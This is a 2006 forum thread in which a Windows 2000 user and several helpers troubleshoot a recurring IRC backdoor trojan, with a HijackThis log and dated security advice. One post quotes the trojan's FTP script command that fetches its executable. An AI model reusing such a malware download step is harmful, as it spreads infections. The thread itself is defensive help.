This on a fresh installation of windows 2000.

I assume you mean you reformatted and started again. If you simply reinstalled over the top this would almost never kill a virus, etc.

Assuming it was a clean reinstall, you obviously made the same mistake and got infected again.

1) You need to perform a complete antivirus scan.
2) Ditch Internet Explorer and use Opera or Firefox.
3) You probably need to install firewall software - ZoneAlarm is popular.

If you use this computer for banking or even buying stuff with credit cards, a complete scrub clean is advisable, however, before you do that, download Firefox, ZoneAlarm and AVG onto a cd or flash drive so that you can install them before connecting to the internet.

Kaled.

reformatted and started again

Yes!

The system takes up 2.6GB which includes a 2GB pagefile.sys.

And I know that I could use firefox.

Even if I am not touching the pc, after a while it pops up again

I know that I can try installing all kinds of software.
I know that I can (and do) use linux instead.

I have AVG anti-virus and AVG anti-spyware (formerly Ewido) installed.

But I want to know, on windows, how to turn off the service, port, or whatever that lets this IRC trojan guy plant stuff on my system.

Have you disabled Messenger? Is that what you're after?

Kaled.

Yep. First thing I did was disable messenger.
AdministrativeTools->Services->Messenger [Stop / StartupType(manual)]

Nope, not what I was after.

Whether it was a fresh installation or whatever, you are infected with a trojan. Specifically backdoor.irc.sdbot or a variation of it.

How did you get infected with the trojan on a fresh install? How old is the install? By that I mean, did you JUST format and reinstall or has it been a week or two? Somehow, somewhere you got infected.

Blocking IRC is simple enough, but you will need some type of firewall either hardware or software (such as zone alarm as was already recommended), but the reality is you have a trojan and need to get rid of that.

You are running an antivirus, but it sounds to me as if your system was either already infected when you installed the antivirus or your AV program isn't picking up the trojan. It's picking up it's attempt to write to the system32 directory, but not the original trojan itself which is what you need to get rid of.

Doing a quick search. I didn't find anything specific for irc.sdbot2

but many things for backdoor.irc.sdbot which leads me to believe what you have may be a variant of the original sdbot trojan.

Less than 24 hrs. old.
And the AVG reported the virus within 30 minutes of the fresh install.
If I didn't know how I got infected with it, how would I know how I got infected with it?

Here is exactly what it says in AVG virus vault:
Trojan horse IRC/BackDoor.SdBot2.JJK
C:\WINNT\System32\x.exe
Moved object
infected

And you are right that a search does not turn up any information on this exact thing.
If you interested in that file - i - in my first post, it is an ftp script and anyone could do:
ftp -n -s:i
to download the stupid x.exe file.

Blocking IRC is simple enough

How can I do it without installing more software?

[edited by: lmo4103 at 3:31 pm (utc) on Oct. 11, 2006]

Since neither of us can find any information on that specific variation it is likely that the antivirus prog doens't have the definition for that virus.

Did you have this problem prior to the reinstall or is this new since the format/reinstall?

It could be that you just had REALLY bad luck and got hit with some type of exploit right after you did the fresh install.

Did you download all the windows patches/updates immediately after you did the fresh install or did you wait (or even worse, have you not done that yet)?

My recommendation:

1) Get zone alarm, download it, save it to hard drive or burn it to a cd

2) Take the computer offline and do yet another fresh install. Format, reinstall, everything.

3) Install zone alarm

4) Reconnect and immediately go to windows update and get all the latest updates.

5) Install antivirus

6) Get Firefox and never use IE unless absolutely necessary.

It could be that you just had REALLY bad luck and got hit with some type of exploit right after you did the fresh install.

Did you download all the windows patches/updates immediately after you did the fresh install or did you wait (or even worse, have you not done that yet)?

Yes, bad luck!

I redid this 3 times and 3 times bad luck too!

Hey! At 56k, downloading all the windows patches is 12hrs. solid!
I have ordered SP4 cd.

But there should be a way to gain control of my own computer!

I completely agree. Just very hard when your antivirus won't pick up the trojan. You could always try a different antivirus. There are a few free ones out there. Maybe the heuristics in another program would work better at finding the trojan.

Still, 3 times and this happens every time. That is bad...and you are positive you are completely formatting the harddrive one each reinstall?

That is crazy!

A couple of additional thoughts. Is this a standalone computer or is it networked with others that could be infecting it?

Are there any other programs you have installed that could be the source of the trojan? Something you have installed again with each fresh install?

[edited by: Philosopher at 3:59 pm (utc) on Oct. 11, 2006]

I would recommend doing a reboot into safemode, run a antivirus sweep after the dats are updated, once the scan is complete, trojan found, deleted/removed, unplug the power cable, to kill anything being stored in memory
rinse and repeat as necessary until AV comes up clean
before doing all this, get zone alarm, free edition if you have to.
stop all nonsessential services, messenger, wi-fi, if its a desktop...find a copy of msconfig, since w2k doesn't come with it, get from win98 or winxp
run it, take a look at your startups, and hide all microsoft services and see what services are running.
do you have another working computer? anything you find of suspect on the machine, google it. see what others say about it.
maybe even after installing zonealarm and getting copy of msconfig, updating AV, unplug the computer from internet/network
and do the AV scan with power cord removal each time.

Just very hard when your antivirus won't pick up the trojan.

You didn't read my first post.

Grissoft keeps catching it.

It does catch it!

Is there a way to turn off/ prohibit IRC on windows?

Review:
1.Format partition
2.Install windows 2000 from windows 2000 cd
3.Install Grissoft anti-virus
4.Update virus database
5.Grissoft catches Trojan horse IRC/BackDoor.SdBot2.JJK and puts it in virus vault

[edited by: lmo4103 at 5:25 pm (utc) on Oct. 11, 2006]

I read your post just fine..as I said it picks up the attempt to write the new files, but it is NOT picking up the actual trojan and getting rid of it or you wouldn't keep having this problem.

Your AV program is picking up the symptom of the problem, not the cause and that is what you need to get rid of. If it was getting rid of the cause, you wouldn't keep having this problem.

I would try youfoundjakes suggestion and boot into safemode and scan with your AV prog again and see if it finds it that way.

As to the IRC blocking, you can't do it from windows alone. You need a separate program that monitors and blocks internet traffic by blocking specific ports.

[edited by: Philosopher at 5:23 pm (utc) on Oct. 11, 2006]

File and printer sharing?
Administrator password null/guessable?
Have you done a full virus scan?

Firewalls exist for a reason. I can see no valid reason for not installing Zone Alarm or a similar program.

If the trojan is being repeatedly installed (and caught by AVG) then either it is being installed directly (for which you must ensure file sharing is suitably blocked and install a firewall) or an attempt is being made periodically to reinstall it either by another process or as scheduled event.

If Zone Alarm does not block these attempts and they continue after a full virus scan, you have no alternative to but to start again, and this time use proper security software from the start.

If you don't want to follow advice, then learn to live with the infection.

Kaled.

Administrator password is not null/ not guessable

Safe Mode -> Full System Scan -> Test Results -> No Virus Found

No Shared Printers / No Shared Folders

Going out a little bit further, any of the software that you are initially installing, did you get them from the vendor or download off a p2p network? Are you using any key generators for licensing, that could be the culprit.
Download AdAware SE and do a scan in safe mode after updating its definitions as well.
Try and get a copy of hijackthis.exe and post the results here.
Also try scanning with a different AV, maybe NOD32. See what results they yield.
Just out of curiousity, when you format the partition, is it all one partition? or is your hard drive broken up into multiple partitions? What file system are you selecting?
Get zonealarm.

No software installed except Explorer6, Grosoft anti-virus & anti-spyware, hijack-this

Logfile of HijackThis v1.97.7
Scan saved at 3:31:56 PM, on 10/11/2006
Platform: Windows 2000 (WinNT 5.00.2195)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

Running processes:
C:\WINNT\System32\smss.exe
C:\WINNT\system32\winlogon.exe
C:\WINNT\system32\services.exe
C:\WINNT\system32\lsass.exe
C:\WINNT\system32\svchost.exe
C:\WINNT\system32\spoolsv.exe
C:\Program Files\Grisoft\AVG Anti-Spyware 7.5\guard.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgamsvr.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgupsvc.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgemc.exe
C:\WINNT\System32\svchost.exe
C:\WINNT\system32\MSTask.exe
C:\WINNT\System32\WBEM\WinMgmt.exe
C:\WINNT\Explorer.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgcc.exe
C:\Program Files\Grisoft\AVG Anti-Spyware 7.5\avgas.exe
C:\Program Files\Internet Explorer\IEXPLORE.EXE
E:\download\searchalot\HijackThis.exe

O3 - Toolbar: &Radio - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINNT\System32\msdxm.ocx
O4 - HKLM\..\Run: [Synchronization Manager] mobsync.exe /logon
O4 - HKLM\..\Run: [AVG7_CC] C:\PROGRA~1\Grisoft\AVGFRE~1\avgcc.exe /STARTUP
O4 - HKLM\..\Run: [!AVG Anti-Spyware] "C:\Program Files\Grisoft\AVG Anti-Spyware 7.5\avgas.exe" /minimized
O9 - Extra button: Related (HKLM)
O9 - Extra 'Tools' menuitem: Show &Related Links (HKLM)
O16 - DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} (WUWebControl Class) - [update.microsoft.com...]
O17 - HKLM\System\CCS\Services\Tcpip\..\{092648CB-F073-4C16-A579-6FFF6F5DB46D}: NameServer = 205.152.37.23 205.152.144.23

Downloading zone alarm - 30 minutes left

The E:\ drive, is that a physical partition, or is that a thumbdrive?
I take it that d:\ is the cdrom?

C:\ drive - windows installation
D:\ drive - hardware device drivers collection
E:\ drive - data files
Safe Mode -> Full System Scan -> Test Results -> No Virus Found

when you have done your fresh installs. Are you also formatting the d & e drives? or only the c drive?

[edited by: Philosopher at 8:03 pm (utc) on Oct. 11, 2006]

format c:
I'm not going to format my data.

Philospher: Exactly my thought also, when you install the OS, and then install AV or any other programs, are they getting installed to D:\ or E:\?

c:\ drive - system plus program files

Do you have a cd burner or dvd burner, more then one machine? Is there anyway to copy contents of d and e so that those drives can be formatted as well?
Did you get all the apps from the vendor?
Each time that AVG reports the trojan, is it the same filename, or is it changing?

No Shared Folders

That's not what I meant. Under Windows NT, etc. the C: drive is notionally shared as C$, etc.

Is file/printer sharing enabled for your internet connection? You need to open the properties dialog for the connection.

Kaled.

Unfortunately when you removing the administrative share of c$ it appears again after the next reboot, unless there is some kind of hack out there, but off the top of my head, I couldn't think of it.

You can certainly remove administrative shares, but at a cost -- I tried that
and many programs no longer worked.

Strange... Nobody can explain IPSec policy to block IRC ports or how to do in TCP.

Waiting for SP4 CDs to arrive....

I wasn't suggesting removing administrative sharing. I was pointing out that it is possible to enable/disable file sharing on a specific network connection (i.e. your internet connection).

I doubt that this was the route by which the infection arrived (or continued to reappear) but since it only takes a few seconds to check I thought it was worth pointing out.

Kaled.

enable/disable file sharing on a specific network connection

How?

I wrote

Is file/printer sharing enabled for your internet connection? You need to open the properties dialog for the connection.

From the Control Panel, open the Network Connections folder and the open the properties dialog for the network adapter. For Internet access, only the TCP/IP box needs to be ticked.

However, if the same network adapter is used to connect to the Internet and to a local area network, this may not be appropriate.

From memory, using a dialup adapter, you may be prompted to disable sharing but I'm not sure.

Kaled.